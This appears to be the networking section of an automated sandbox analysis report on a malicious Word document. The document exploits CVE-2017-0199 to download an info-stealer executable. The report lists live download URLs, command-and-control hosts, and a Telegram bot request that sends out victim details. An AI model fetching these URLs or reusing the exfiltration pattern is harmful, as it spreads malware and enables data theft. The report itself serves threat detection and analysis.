Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
Source: global traffic TCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163

Networking

Source: Network traffic Suricata IDS: 2024413 - Severity 1 - ET EXPLOIT CVE-2017-0199 Common Obfus Stage 2 DL : 66.63.187.123:80 -> 192.168.2.22:49163
Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49166
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49166
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Fri, 27 Sep 2024 14:00:37 GMTContent-Type: application/x-msdos-programContent-Length: 673280Connection: keep-aliveLast-Modified: Fri, 27 Sep 2024 03:14:38 GMTETag: "a4600-6231141618562"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%209/27/2024%20/%2011:31:56%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 66.63.187.123 66.63.187.123
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49170 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49169 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49171 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic HTTP traffic detected: GET /txt/millizxc.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.123Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /txt/H363BpKqz0MdVd7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 66.63.187.123
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E869B705-8442-482B-ACFD-8A589F7F3952}.tmp
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 27 Sep 2024 14:01:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: txt on 66.63.187.123.url.0.dr String found in binary or memory: http://66.63.187.123/txt/
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000003.422853483.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.422892150.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000068C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exe
Source: EQNEDT32.EXE, 00000009.00000003.422853483.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000068C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exeC:
Source: EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exej
Source: EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exettC:
Source: millizxc.doc.url.0.dr String found in binary or memory: http://66.63.187.123/txt/millizxc.doc
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002442000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002520000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: millitingacy20306.exe, 0000000D.00000002.952374182.00000000058C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: millitingacy20306.exe, 0000000D.00000002.952374182.00000000058C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000246D000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: millitingacy20306.exe, 0000000A.00000002.436028498.0000000002200000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20a
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=net
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=wmf
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003527000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003502000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034CD000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003581000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: millitingacy20306.exe, 0000000D.00000002.951853308.000000000356C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034DA000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034B8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000358E000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035C6000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/indextest
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
